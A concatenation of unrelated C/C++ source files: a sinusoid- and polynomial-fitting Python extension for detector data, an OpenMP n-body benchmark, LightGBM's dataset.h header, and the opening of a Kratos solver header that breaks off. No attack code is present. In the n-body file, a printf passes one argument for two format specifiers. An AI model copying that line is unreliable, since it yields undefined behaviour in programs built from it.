fit_poly(tcopy, y, nwin, order, samp, fit_1f);
for (i = 0; i < nwin; i++)
y[i] -= fit_1f[i];
// Fit sinusoidal to obtain amplitude and phase
fit_sine(ctime, y, nwin, f, fit_syn, coeff_syn);
A = sqrt(coeff_syn[0]*coeff_syn[0] + coeff_syn[1]*coeff_syn[1]);
if (A == 0) theta = 0.0;
else if (coeff_syn[0] > 0) theta = atan(coeff_syn[1]/coeff_syn[0]);
else theta = atan(coeff_syn[1]/coeff_syn[0]) + M_PI;
sync_amp[n] = A;
sync_phase[n] = theta;
// Find fit RMS error
rms = 0.0;
for (i = 0; i < nwin; i++)
rms += (y[i] - fit_syn[i])*(y[i] - fit_syn[i]);
sync_rms[n] = sqrt(rms/nwin);
} /* pragma omp for */
free(y);
free(fit_1f);
free(fit_syn);
free(coeff_syn);
} /* pragma omp parallel */
free(tcopy);
return 0;
}
/// Fit sinusoidal of a given frequency to data.
/// \param t Independent variable (time).
/// \param y Dependent variable (data).
/// \param n Number of elements in data.
/// \param f Frequency of the sinusoid.
/// \param fit Vector of fitted data (sinusoid).
/// \param coeff Coefficients of sinusoid (A*cos(th) + B*sin(th)).
static int fit_sine(double *t, double *y, int n, double f,
double *fit, double *coeff) {
int k;
double temp_c, temp_s;
double cos2, sin2, sincos, ycos, ysin;
cos2 = sin2 = sincos = ycos = ysin = 0.0;
for (k = 0; k < n; k++) {
temp_c = cos(2*M_PI*f*t[k]);
temp_s = sin(2*M_PI*f*t[k]);
cos2 += temp_c*temp_c;
sin2 += temp_s*temp_s;
sincos += temp_s*temp_c;
ycos += y[k]*temp_c;
ysin += y[k]*temp_s;
}
coeff[0] = (sin2*ycos - sincos*ysin) / (cos2*sin2 - sincos*sincos);
coeff[1] = (cos2*ysin - sincos*ycos) / (cos2*sin2 - sincos*sincos);
// Evaluate result
for (k = 0; k < n; k++) {
fit[k] = cos(2*M_PI*f*t[k])*coeff[0] + sin(2*M_PI*f*t[k])*coeff[1];
}
return 0;
}
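/* Minimal self-test for fit_sine (an illustrative sketch, not part of the
* original module; FIT_SINE_DEMO and fit_sine_demo are hypothetical names).
* It synthesizes y = 3*cos(2*pi*f*t) + 4*sin(2*pi*f*t) on a 400 Hz grid and
* recovers the coefficients, which should come back close to (3, 4). */
#ifdef FIT_SINE_DEMO
#include <math.h>
static void fit_sine_demo(void)
{
enum { NDEMO = 1000 };
static double t[NDEMO], y[NDEMO], fitv[NDEMO];
double coeff[2];
const double f = 2.0; /* Hz */
for (int k = 0; k < NDEMO; k++) {
t[k] = k / 400.0; /* 400 Hz sampling */
y[k] = 3.0*cos(2*M_PI*f*t[k]) + 4.0*sin(2*M_PI*f*t[k]);
}
fit_sine(t, y, NDEMO, f, fitv, coeff);
/* coeff[0] ~= 3.0 and coeff[1] ~= 4.0 up to rounding error */
}
#endif /* FIT_SINE_DEMO */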
/// Fit polynomial to data to remove common mode.
/// \param x Independent variable.
/// \param y Dependent variable (data).
/// \param n Number of elements in data.
/// \param order Order of the polynomial to fit.
/// \param samp Number of samples to take from data to do the fit.
/// \param fit Vector with the evaluated polynomial.
static int fit_poly(float *x, double *y, int n, int order, int samp,
double *fit) {
int i, j, k;
int N;
double *coeff;
double **A, *pows;
double temp;
int signum = 0;
int status = 1; // failure.
// Validate the arguments before any allocation so the early returns cannot leak.
if (order <= 0) {
print_error("Invalid 'order=%i' in fit_poly\n", order);
return 1;
}
N = n/samp;
if (N < order) {
print_error("Fitting 'order=%i' with 'N=%i' data points in fit_poly\n", order, N);
return 1;
}
// Initialize matrices and vectors
gsl_vector *g_Ab = gsl_vector_calloc(order+1);
gsl_matrix *g_AA = gsl_matrix_alloc(order+1,order+1);
gsl_vector *g_x = gsl_vector_alloc(order+1);
gsl_permutation *g_p = gsl_permutation_alloc(order+1);
coeff = malloc((order+1) * sizeof(double));
A = (double **)malloc((order+1) * sizeof(double *));
A[0] = (double *)malloc(N * (order+1) * sizeof(double));
for (i = 0; i < order+1; i++){
A[i] = A[0] + N * i;
for( j = 0; j < N; j++ ) A[i][j] = 0.0;
}
pows = (double *)malloc((2*order+1) * sizeof(double));
for (i = 0; i < 2*order+1; i++)
pows[i] = 0.0;
// Generate A matrix
for (i = 0; i < order+1; i++)
for (k = 0; k < N; k++) {
A[i][k] = 1.0;
for (j = 0; j < i; j++)
A[i][k] *= x[k*samp + samp/2];
}
// Generate AA as transpose(A)*A
for (i = 2*order; i > 0; i -= 2) {
for (k = 0; k < N; k++) {
pows[i] += A[i/2][k]*A[i/2][k];
pows[i-1] += A[i/2][k]*A[i/2-1][k];
}
}
for (k = 0; k < N; k++)
pows[0]++;
for (i = 0; i < order+1; i++)
for (j = 0; j < order+1; j++)
g_AA->data[i*g_AA->tda+j] = pows[i+j];
/* for (i = 0; i < order+1; i++) {
for (j = 0; j <= i; j++) {
for (k = 0; k < N; k++)
AA[i][j] += A[j][k]*A[i][k];
}
}*/
// Generate Ab as transpose(A)*y
for (i = 0; i < order+1; i++) {
for (k = 0; k < N; k++) {
temp = 0.0;
for (j = 0; j < samp; j++)
temp += y[k*samp + j];
g_Ab->data[i] += A[i][k] * temp / (float)samp;
}
}
// Solve system
if ((status = gsl_linalg_LU_decomp(g_AA, g_p, &signum))!=0)
goto exit_now;
if ((status = gsl_linalg_LU_solve(g_AA, g_p, g_Ab, g_x))!=0)
goto exit_now;
// Copy out...
for (i = 0; i < order+1; i++)
coeff[i] = g_x->data[i];
// Evaluate result
for (k = 0; k < n; k++) {
fit[k] = 0.0;
for (i = 0; i < order+1; i++) {
temp = 1.0;
for (j = 0; j < i; j++)
temp *= x[k];
fit[k] += temp * coeff[i];
}
}
/*
for (k = 0; k < n; k++)
fit[k] = 0.0;
for (i = 0; i < order+1; i++)
for (k = 0; k < n; k++)
fit[k] += A[i][k] * Ab[i];
*/
status = 0;
exit_now:
free(A[0]);
free(A);
free(pows);
free(coeff);
gsl_vector_free(g_Ab);
gsl_vector_free(g_x);
gsl_matrix_free(g_AA);
gsl_permutation_free(g_p);
return status;
}
PyDoc_STRVAR(get_sync_amps__doc__,
"get_sync_amps(data, dets, az, ctime)\n"
"\n"
"The arrays must be C-ordered with dimensions like:\n"
" data [ *,n_data] (float)\n"
" dets [n_det] (int)\n"
" az [n_data] (double)\n"
" ctime[n_data] (double)\n"
"\n"
"Returns (az_phase, amps_cos, amps_sin)."
);
static PyObject *get_sync_amps(PyObject *self, PyObject *args)
{
PyArrayObject *data_array;
PyArrayObject *dets_array;
PyArrayObject *az_array;
PyArrayObject *ctime_array;
double scan_freq;
int order, samp, nT;
if (!PyArg_ParseTuple(args, "O!O!O!O!diii",
&PyArray_Type, &data_array,
&PyArray_Type, &dets_array,
&PyArray_Type, &az_array,
&PyArray_Type, &ctime_array,
&scan_freq,
&order,
&samp,
&nT
))
po_raise("invalid arguments.");
// Types and ordering
ASSERT_CARRAY_TYPE_NDIM(data_array, NPY_FLOAT32, 2);
ASSERT_CARRAY_TYPE_NDIM(dets_array, NPY_INT32, 1);
ASSERT_CARRAY_TYPE_NDIM(az_array, NPY_FLOAT64, 1);
ASSERT_CARRAY_TYPE_NDIM(ctime_array, NPY_FLOAT64, 1);
int ndata = PyArray_DIMS(data_array)[1];
int ndet = PyArray_DIMS(dets_array)[0];
po_assert(PyArray_DIMS(az_array)[0] == ndata);
po_assert(PyArray_DIMS(ctime_array)[0] == ndata);
float *data = PyArray_DATA(data_array);
double *az = PyArray_DATA(az_array);
double *ctime = PyArray_DATA(ctime_array);
int *dets = PyArray_DATA(dets_array);
// We've been so thorough, it would be a shame to segfault now.
for (int i=0; i<ndet; i++)
po_assert(dets[i] >= 0 &&
dets[i] < PyArray_DIMS(data_array)[0]);
// And, places for the results.
npy_intp ndet_ = ndet;
PyArrayObject *amp_array = (PyArrayObject*)
PyArray_SimpleNew(1, &ndet_, NPY_FLOAT32);
PyArrayObject *phase_array = (PyArrayObject*)
PyArray_SimpleNew(1, &ndet_, NPY_FLOAT32);
PyArrayObject *rms_array = (PyArrayObject*)
PyArray_SimpleNew(1, &ndet_, NPY_FLOAT32);
float phaseAz = -1.;
mbSyncFit(az, ctime,
data, ndata,
dets, ndet,
PyArray_DATA(amp_array),
PyArray_DATA(phase_array),
PyArray_DATA(rms_array),
&phaseAz,
scan_freq, order, samp, nT);
return Py_BuildValue("NNNf",
amp_array,
phase_array,
rms_array,
phaseAz);
}
PyMethodDef pyactpol_sync_methods[] = {
{"get_sync_amps", get_sync_amps, METH_VARARGS,
get_sync_amps__doc__},
{NULL, NULL, 0, NULL} /* Sentinel */
};
|
nbody-block.c | #include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include "timer.h"
#define CACHELINE 64 // size of cache line [bytes]
#define SOFTENING 1e-9f
typedef struct { float *x, *y, *z, *vx, *vy, *vz; } BodySystem;
void randomizeBodies(float *data, int n) {
for (int i = 0; i < n; i++) {
data[i] = 2.0f * (rand() / (float)RAND_MAX) - 1.0f;
}
}
void bodyForce(BodySystem p, float dt, int n, int tileSize) {
for (int tile = 0; tile < n; tile += tileSize) {
int to = tile + tileSize;
if (to > n) to = n;
#pragma omp parallel for schedule(dynamic)
for (int i = 0; i < n; i++) {
float Fx = 0.0f; float Fy = 0.0f; float Fz = 0.0f;
for (int j = tile; j < to; j++) {
float dy = p.y[j] - p.y[i];
float dz = p.z[j] - p.z[i];
float dx = p.x[j] - p.x[i];
float distSqr = dx*dx + dy*dy + dz*dz + SOFTENING;
float invDist = 1.0f / sqrtf(distSqr);
float invDist3 = invDist * invDist * invDist;
Fx += dx * invDist3; Fy += dy * invDist3; Fz += dz * invDist3;
}
p.vx[i] += dt*Fx; p.vy[i] += dt*Fy; p.vz[i] += dt*Fz;
}
}
}
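// CACHELINE is defined above but never used. As an illustrative sketch
// (suggestTileSize is a hypothetical helper, not part of the original
// benchmark), a cache-aware tile size could be derived by keeping one tile
// of x/y/z coordinates (3 floats per body) inside a ~1 MiB slice of
// last-level cache, clamped to the problem size:
int suggestTileSize(int nBodies) {
const int bytesPerBody = 3 * (int)sizeof(float); // x, y, z of the j-bodies
int tile = (1 << 20) / bytesPerBody; // bodies fitting in ~1 MiB
return tile < nBodies ? tile : nBodies;
}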
int main(const int argc, const char** argv) {
int nBodies = 32768;
if (argc > 1) nBodies = atoi(argv[1]);
int tileSize = 24400;
if (tileSize > nBodies) tileSize = nBodies;
const float dt = 0.01f; // time step
const int nIters = 10; // simulation iterations
int bytes = 6*nBodies*sizeof(float);
float *buf = (float*)malloc(bytes);
BodySystem p;
p.x = buf+0*nBodies; p.y = buf+1*nBodies; p.z = buf+2*nBodies;
p.vx = buf+3*nBodies; p.vy = buf+4*nBodies; p.vz = buf+5*nBodies;
randomizeBodies(buf, 6*nBodies); // Init pos / vel data
double totalTime = 0.0;
for (int iter = 1; iter <= nIters; iter++) {
StartTimer();
bodyForce(p, dt, nBodies, tileSize); // compute interbody forces
for (int i = 0 ; i < nBodies; i++) { // integrate position
p.x[i] += p.vx[i]*dt;
p.y[i] += p.vy[i]*dt;
p.z[i] += p.vz[i]*dt;
}
const double tElapsed = GetTimer() / 1000.0;
if (iter > 1) { // First iter is warm up
totalTime += tElapsed;
}
#ifndef SHMOO
printf("Iteration %d: %.3f seconds\n", iter, tElapsed);
#endif
}
double avgTime = totalTime / (double)(nIters-1);
#ifdef SHMOO
printf("%d, %0.3f\n", nBodies, 1e-9 * nBodies * nBodies / avgTime);
#else
printf("Average rate for iterations 2 through %d: %.3f steps per second.\n",
nIters);
printf("%d Bodies: average %0.3f Billion Interactions / second\n", nBodies, 1e-9 * nBodies * nBodies / avgTime);
#endif
free(buf);
}
|
dataset.h | /*!
* Copyright (c) 2016 Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See LICENSE file in the project root for license information.
*/
#ifndef LIGHTGBM_DATASET_H_
#define LIGHTGBM_DATASET_H_
#include <LightGBM/config.h>
#include <LightGBM/feature_group.h>
#include <LightGBM/meta.h>
#include <LightGBM/utils/openmp_wrapper.h>
#include <LightGBM/utils/random.h>
#include <LightGBM/utils/text_reader.h>
#include <string>
#include <functional>
#include <memory>
#include <mutex>
#include <unordered_set>
#include <utility>
#include <vector>
namespace LightGBM {
/*! \brief forward declaration */
class DatasetLoader;
/*!
* \brief This class is used to store some meta (non-feature) data for training data,
* e.g. labels, weights, initial scores, query level information.
*
* Some details:
* 1. Label, used for training.
* 2. Weights, weights of records, optional.
* 3. Query boundaries, necessary for lambdarank.
* The documents of the i-th query are in [ query_boundaries[i], query_boundaries[i+1] ).
* 4. Query weights, calculated automatically from weights and query_boundaries (if both exist);
* the weight for the i-th query is sum(weights[query_boundaries[i]], ..., weights[query_boundaries[i+1] - 1]) / (query_boundaries[i+1] - query_boundaries[i]).
* 5. Initial score, optional. If existing, the model will boost from this score, otherwise it will start from 0.
*/
class Metadata {
public:
/*!
* \brief Null constructor
*/
Metadata();
/*!
* \brief Initialization will load query level information, since it is needed for sampling data
* \param data_filename Filename of data
* \param initscore_file Filename of initial score
*/
void Init(const char* data_filename, const char* initscore_file);
/*!
* \brief Init as a subset of another metadata object
* \param metadata Source metadata to take the subset from
* \param used_indices Indices of the used records
* \param num_used_indices Number of used indices
*/
void Init(const Metadata& metadata, const data_size_t* used_indices, data_size_t num_used_indices);
/*!
* \brief Initialize from binary memory
* \param memory Pointer to memory
*/
void LoadFromMemory(const void* memory);
/*! \brief Destructor */
~Metadata();
/*!
* \brief Initial work, will allocate space for label, weight (if it exists) and query (if it exists)
* \param num_data Number of training data
* \param weight_idx Index of the weight column, < 0 means it doesn't exist
* \param query_idx Index of the query id column, < 0 means it doesn't exist
*/
void Init(data_size_t num_data, int weight_idx, int query_idx);
/*!
* \brief Partition label by used indices
* \param used_indices Indices of locally used records
*/
void PartitionLabel(const std::vector<data_size_t>& used_indices);
/*!
* \brief Partition meta data according to local used indices if needed
* \param num_all_data Number of total training data, including other machines' data on parallel learning
* \param used_data_indices Indices of local used training data
*/
void CheckOrPartition(data_size_t num_all_data,
const std::vector<data_size_t>& used_data_indices);
void SetLabel(const label_t* label, data_size_t len);
void SetWeights(const label_t* weights, data_size_t len);
void SetQuery(const data_size_t* query, data_size_t len);
/*!
* \brief Set initial scores
* \param init_score Initial scores, this class will manage memory for init_score.
*/
void SetInitScore(const double* init_score, data_size_t len);
/*!
* \brief Save binary data to file
* \param writer File writer to write to
*/
void SaveBinaryToFile(const VirtualFileWriter* writer) const;
/*!
* \brief Get sizes in byte of this object
*/
size_t SizesInByte() const;
/*!
* \brief Get pointer of label
* \return Pointer of label
*/
inline const label_t* label() const { return label_.data(); }
/*!
* \brief Set label for one record
* \param idx Index of this record
* \param value Label value of this record
*/
inline void SetLabelAt(data_size_t idx, label_t value) {
label_[idx] = value;
}
/*!
* \brief Set Weight for one record
* \param idx Index of this record
* \param value Weight value of this record
*/
inline void SetWeightAt(data_size_t idx, label_t value) {
weights_[idx] = value;
}
/*!
* \brief Set Query Id for one record
* \param idx Index of this record
* \param value Query Id value of this record
*/
inline void SetQueryAt(data_size_t idx, data_size_t value) {
queries_[idx] = static_cast<data_size_t>(value);
}
/*!
* \brief Get weights; if they do not exist, returns nullptr
* \return Pointer of weights
*/
inline const label_t* weights() const {
if (!weights_.empty()) {
return weights_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get data boundaries on queries; if they do not exist, returns nullptr.
* We assume data is ordered by query;
* the interval [query_boundaries[i], query_boundaries[i+1])
* holds the data indices for query i.
* \return Pointer of data boundaries on queries
*/
inline const data_size_t* query_boundaries() const {
if (!query_boundaries_.empty()) {
return query_boundaries_.data();
} else {
return nullptr;
}
}
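/*!
* Illustrative only (not part of the original API): with the boundaries
* above, the records of query q can be visited as
* for (data_size_t d = query_boundaries()[q]; d < query_boundaries()[q + 1]; ++d) { ... }
* for each q in [0, num_queries()), after checking query_boundaries() != nullptr.
*/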
/*!
* \brief Get Number of queries
* \return Number of queries
*/
inline data_size_t num_queries() const { return num_queries_; }
/*!
* \brief Get weights for queries; if they do not exist, returns nullptr
* \return Pointer of weights for queries
*/
inline const label_t* query_weights() const {
if (!query_weights_.empty()) {
return query_weights_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get initial scores; if they do not exist, returns nullptr
* \return Pointer of initial scores
*/
inline const double* init_score() const {
if (!init_score_.empty()) {
return init_score_.data();
} else {
return nullptr;
}
}
/*!
* \brief Get size of initial scores
*/
inline int64_t num_init_score() const { return num_init_score_; }
/*! \brief Disable copy */
Metadata& operator=(const Metadata&) = delete;
/*! \brief Disable copy */
Metadata(const Metadata&) = delete;
private:
/*! \brief Load initial scores from file */
void LoadInitialScore(const char* initscore_file);
/*! \brief Load weights from file */
void LoadWeights();
/*! \brief Load query boundaries from file */
void LoadQueryBoundaries();
/*! \brief Load query weights */
void LoadQueryWeights();
/*! \brief Filename of current data */
std::string data_filename_;
/*! \brief Number of data */
data_size_t num_data_;
/*! \brief Number of weights, used to check correct weight file */
data_size_t num_weights_;
/*! \brief Label data */
std::vector<label_t> label_;
/*! \brief Weights data */
std::vector<label_t> weights_;
/*! \brief Query boundaries */
std::vector<data_size_t> query_boundaries_;
/*! \brief Query weights */
std::vector<label_t> query_weights_;
/*! \brief Number of queries */
data_size_t num_queries_;
/*! \brief Number of initial scores, used to check the initial score file */
int64_t num_init_score_;
/*! \brief Initial score */
std::vector<double> init_score_;
/*! \brief Queries data */
std::vector<data_size_t> queries_;
/*! \brief Mutex for thread-safe calls */
std::mutex mutex_;
bool weight_load_from_file_;
bool query_load_from_file_;
bool init_score_load_from_file_;
};
/*! \brief Interface for Parser */
class Parser {
public:
/*! \brief virtual destructor */
virtual ~Parser() {}
/*!
* \brief Parse one line with label
* \param str One line record, string format, should end with '\0'
* \param out_features Output columns, store in (column_idx, values)
* \param out_label Label will store to this if exists
*/
virtual void ParseOneLine(const char* str,
std::vector<std::pair<int, double>>* out_features, double* out_label) const = 0;
virtual int TotalColumns() const = 0;
/*!
* \brief Create an object of parser; it will automatically choose the format depending on the file
* \param filename Filename of data
* \param header Whether the file contains a header line
* \param num_features Pass num_features of this data file if known, <= 0 means unknown
* \param label_idx Index of label column
* \return Object of parser
*/
static Parser* CreateParser(const char* filename, bool header, int num_features, int label_idx);
};
/*! \brief The main class of data set,
* which is used for training or validation
*/
class Dataset {
public:
friend DatasetLoader;
LIGHTGBM_EXPORT Dataset();
LIGHTGBM_EXPORT Dataset(data_size_t num_data);
void Construct(
std::vector<std::unique_ptr<BinMapper>>& bin_mappers,
int** sample_non_zero_indices,
const int* num_per_col,
size_t total_sample_cnt,
const Config& io_config);
/*! \brief Destructor */
LIGHTGBM_EXPORT ~Dataset();
LIGHTGBM_EXPORT bool CheckAlign(const Dataset& other) const {
if (num_features_ != other.num_features_) {
return false;
}
if (num_total_features_ != other.num_total_features_) {
return false;
}
if (label_idx_ != other.label_idx_) {
return false;
}
for (int i = 0; i < num_features_; ++i) {
if (!FeatureBinMapper(i)->CheckAlign(*(other.FeatureBinMapper(i)))) {
return false;
}
}
return true;
}
inline void PushOneRow(int tid, data_size_t row_idx, const std::vector<double>& feature_values) {
if (is_finish_load_) { return; }
for (size_t i = 0; i < feature_values.size() && i < static_cast<size_t>(num_total_features_); ++i) {
int feature_idx = used_feature_map_[i];
if (feature_idx >= 0) {
const int group = feature2group_[feature_idx];
const int sub_feature = feature2subfeature_[feature_idx];
feature_groups_[group]->PushData(tid, sub_feature, row_idx, feature_values[i]);
}
}
}
inline void PushOneRow(int tid, data_size_t row_idx, const std::vector<std::pair<int, double>>& feature_values) {
if (is_finish_load_) { return; }
for (auto& inner_data : feature_values) {
if (inner_data.first >= num_total_features_) { continue; }
int feature_idx = used_feature_map_[inner_data.first];
if (feature_idx >= 0) {
const int group = feature2group_[feature_idx];
const int sub_feature = feature2subfeature_[feature_idx];
feature_groups_[group]->PushData(tid, sub_feature, row_idx, inner_data.second);
}
}
}
inline void PushOneData(int tid, data_size_t row_idx, int group, int sub_feature, double value) {
feature_groups_[group]->PushData(tid, sub_feature, row_idx, value);
}
inline int RealFeatureIndex(int fidx) const {
return real_feature_idx_[fidx];
}
inline int InnerFeatureIndex(int col_idx) const {
return used_feature_map_[col_idx];
}
inline int Feature2Group(int feature_idx) const {
return feature2group_[feature_idx];
}
inline int Feture2SubFeature(int feature_idx) const {
return feature2subfeature_[feature_idx];
}
inline uint64_t GroupBinBoundary(int group_idx) const {
return group_bin_boundaries_[group_idx];
}
inline uint64_t NumTotalBin() const {
return group_bin_boundaries_.back();
}
inline std::vector<int> ValidFeatureIndices() const {
std::vector<int> ret;
for (int i = 0; i < num_total_features_; ++i) {
if (used_feature_map_[i] >= 0) {
ret.push_back(i);
}
}
return ret;
}
void ReSize(data_size_t num_data);
void CopySubset(const Dataset* fullset, const data_size_t* used_indices, data_size_t num_used_indices, bool need_meta_data);
LIGHTGBM_EXPORT void FinishLoad();
LIGHTGBM_EXPORT bool SetFloatField(const char* field_name, const float* field_data, data_size_t num_element);
LIGHTGBM_EXPORT bool SetDoubleField(const char* field_name, const double* field_data, data_size_t num_element);
LIGHTGBM_EXPORT bool SetIntField(const char* field_name, const int* field_data, data_size_t num_element);
LIGHTGBM_EXPORT bool GetFloatField(const char* field_name, data_size_t* out_len, const float** out_ptr);
LIGHTGBM_EXPORT bool GetDoubleField(const char* field_name, data_size_t* out_len, const double** out_ptr);
LIGHTGBM_EXPORT bool GetIntField(const char* field_name, data_size_t* out_len, const int** out_ptr);
LIGHTGBM_EXPORT bool GetInt8Field(const char* field_name, data_size_t* out_len, const int8_t** out_ptr);
/*!
* \brief Save current dataset into binary file, will save to "filename.bin"
*/
LIGHTGBM_EXPORT void SaveBinaryFile(const char* bin_filename);
LIGHTGBM_EXPORT void DumpTextFile(const char* text_filename);
LIGHTGBM_EXPORT void CopyFeatureMapperFrom(const Dataset* dataset);
LIGHTGBM_EXPORT void CreateValid(const Dataset* dataset);
void ConstructHistograms(const std::vector<int8_t>& is_feature_used,
const data_size_t* data_indices, data_size_t num_data,
int leaf_idx,
std::vector<std::unique_ptr<OrderedBin>>& ordered_bins,
const score_t* gradients, const score_t* hessians,
score_t* ordered_gradients, score_t* ordered_hessians,
bool is_constant_hessian,
HistogramBinEntry* histogram_data) const;
void FixHistogram(int feature_idx, double sum_gradient, double sum_hessian, data_size_t num_data,
HistogramBinEntry* data) const;
inline data_size_t Split(int feature,
const uint32_t* threshold, int num_threshold, bool default_left,
data_size_t* data_indices, data_size_t num_data,
data_size_t* lte_indices, data_size_t* gt_indices) const {
const int group = feature2group_[feature];
const int sub_feature = feature2subfeature_[feature];
return feature_groups_[group]->Split(sub_feature, threshold, num_threshold, default_left, data_indices, num_data, lte_indices, gt_indices);
}
inline int SubFeatureBinOffset(int i) const {
const int sub_feature = feature2subfeature_[i];
if (sub_feature == 0) {
return 1;
} else {
return 0;
}
}
inline int FeatureNumBin(int i) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature]->num_bin();
}
inline int8_t FeatureMonotone(int i) const {
if (monotone_types_.empty()) {
return 0;
} else {
return monotone_types_[i];
}
}
inline double FeaturePenalte(int i) const {
if (feature_penalty_.empty()) {
return 1;
} else {
return feature_penalty_[i];
}
}
bool HasMonotone() const {
if (monotone_types_.empty()) {
return false;
} else {
for (size_t i = 0; i < monotone_types_.size(); ++i) {
if (monotone_types_[i] != 0) {
return true;
}
}
return false;
}
}
inline int FeatureGroupNumBin(int group) const {
return feature_groups_[group]->num_total_bin_;
}
inline const BinMapper* FeatureBinMapper(int i) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature].get();
}
inline const Bin* FeatureBin(int i) const {
const int group = feature2group_[i];
return feature_groups_[group]->bin_data_.get();
}
inline const Bin* FeatureGroupBin(int group) const {
return feature_groups_[group]->bin_data_.get();
}
inline bool FeatureGroupIsSparse(int group) const {
return feature_groups_[group]->is_sparse_;
}
inline BinIterator* FeatureIterator(int i) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->SubFeatureIterator(sub_feature);
}
inline BinIterator* FeatureGroupIterator(int group) const {
return feature_groups_[group]->FeatureGroupIterator();
}
inline double RealThreshold(int i, uint32_t threshold) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature]->BinToValue(threshold);
}
// given a real threshold, find the closest threshold bin
inline uint32_t BinThreshold(int i, double threshold_double) const {
const int group = feature2group_[i];
const int sub_feature = feature2subfeature_[i];
return feature_groups_[group]->bin_mappers_[sub_feature]->ValueToBin(threshold_double);
}
inline void CreateOrderedBins(std::vector<std::unique_ptr<OrderedBin>>* ordered_bins) const {
ordered_bins->resize(num_groups_);
OMP_INIT_EX();
#pragma omp parallel for schedule(guided)
for (int i = 0; i < num_groups_; ++i) {
OMP_LOOP_EX_BEGIN();
ordered_bins->at(i).reset(feature_groups_[i]->bin_data_->CreateOrderedBin());
OMP_LOOP_EX_END();
}
OMP_THROW_EX();
}
/*!
* \brief Get meta data pointer
* \return Pointer of meta data
*/
inline const Metadata& metadata() const { return metadata_; }
/*! \brief Get Number of used features */
inline int num_features() const { return num_features_; }
/*! \brief Get Number of feature groups */
inline int num_feature_groups() const { return num_groups_;}
/*! \brief Get Number of total features */
inline int num_total_features() const { return num_total_features_; }
/*! \brief Get the index of label column */
inline int label_idx() const { return label_idx_; }
/*! \brief Get names of current data set */
inline const std::vector<std::string>& feature_names() const { return feature_names_; }
inline void set_feature_names(const std::vector<std::string>& feature_names) {
if (feature_names.size() != static_cast<size_t>(num_total_features_)) {
Log::Fatal("Size of feature_names error, should equal with total number of features");
}
feature_names_ = std::vector<std::string>(feature_names);
// replace ' ' in feature_names with '_'
bool spaceInFeatureName = false;
for (auto& feature_name : feature_names_) {
if (feature_name.find(' ') != std::string::npos) {
spaceInFeatureName = true;
std::replace(feature_name.begin(), feature_name.end(), ' ', '_');
}
}
if (spaceInFeatureName) {
Log::Warning("Find whitespaces in feature_names, replace with underlines");
}
}
inline std::vector<std::string> feature_infos() const {
std::vector<std::string> bufs;
for (int i = 0; i < num_total_features_; i++) {
int fidx = used_feature_map_[i];
if (fidx == -1) {
bufs.push_back("none");
} else {
const auto bin_mapper = FeatureBinMapper(fidx);
bufs.push_back(bin_mapper->bin_info());
}
}
return bufs;
}
void ResetConfig(const char* parameters);
/*! \brief Get Number of data */
inline data_size_t num_data() const { return num_data_; }
/*! \brief Disable copy */
Dataset& operator=(const Dataset&) = delete;
/*! \brief Disable copy */
Dataset(const Dataset&) = delete;
void addFeaturesFrom(Dataset* other);
private:
std::string data_filename_;
/*! \brief Store used features */
std::vector<std::unique_ptr<FeatureGroup>> feature_groups_;
/*! \brief Mapper from real feature index to used index*/
std::vector<int> used_feature_map_;
/*! \brief Number of used features*/
int num_features_;
/*! \brief Number of total features*/
int num_total_features_;
/*! \brief Number of total data*/
data_size_t num_data_;
/*! \brief Store some label level data*/
Metadata metadata_;
/*! \brief index of label column */
int label_idx_ = 0;
/*! \brief Threshold for treating a feature as a sparse feature */
double sparse_threshold_;
/*! \brief store feature names */
std::vector<std::string> feature_names_;
/*! \brief Token used to identify the binary dataset file */
static const char* binary_file_token;
int num_groups_;
std::vector<int> real_feature_idx_;
std::vector<int> feature2group_;
std::vector<int> feature2subfeature_;
std::vector<uint64_t> group_bin_boundaries_;
std::vector<int> group_feature_start_;
std::vector<int> group_feature_cnt_;
std::vector<int8_t> monotone_types_;
std::vector<double> feature_penalty_;
bool is_finish_load_;
int max_bin_;
int bin_construct_sample_cnt_;
int min_data_in_bin_;
bool use_missing_;
bool zero_as_missing_;
};
} // namespace LightGBM
#endif  // LIGHTGBM_DATASET_H_
|
residualbased_linear_strategy.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Riccardo Rossi
//
//
#if !defined(KRATOS_RESIDUALBASED_LINEAR_STRATEGY )
#define KRATOS_RESIDUALBASED_LINEAR_STRATEGY
// System includes
// External includes
// Project includes
#include "includes/define.h"
#include "solving_strategies/strategies/solving_strategy.h"
#include "utilities/builtin_timer.h"
//default builder and solver
#include "solving_strategies/builder_and_solvers/builder_and_solver.h"
#include "solving_strategies/builder_and_solvers/residualbased_block_builder_and_solver.h"
namespace Kratos
{
///@name Kratos Globals
///@{
///@}
///@name Type Definitions
///@{
///@}
///@name Enum's
///@{
///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/**
* @class ResidualBasedLinearStrategy
* @ingroup KratosCore
* @brief This is a very simple strategy to solve linearly the problem
* @details As a linear strategy, the check on the convergence is not done and just one non-linear iteration will be performed
* @author Riccardo Rossi
*/
template<class TSparseSpace,
class TDenseSpace, //= DenseSpace<double>,
class TLinearSolver //= LinearSolver<TSparseSpace,TDenseSpace>
>
class ResidualBasedLinearStrategy
: public SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver>
{
public:
///@name Type Definitions */
///@{
/** Counted pointer of ClassName */
KRATOS_CLASS_POINTER_DEFINITION(ResidualBasedLinearStrategy);
typedef SolvingStrategy<TSparseSpace, TDenseSpace, TLinearSolver> BaseType;
typedef typename BaseType::TDataType TDataType;
typedef TSparseSpace SparseSpaceType;
typedef typename BaseType::TSchemeType TSchemeType;
typedef typename BaseType::TBuilderAndSolverType TBuilderAndSolverType;
typedef typename BaseType::DofsArrayType DofsArrayType;
typedef typename BaseType::TSystemMatrixType TSystemMatrixType;
typedef typename BaseType::TSystemVectorType TSystemVectorType;
typedef typename BaseType::LocalSystemVectorType LocalSystemVectorType;
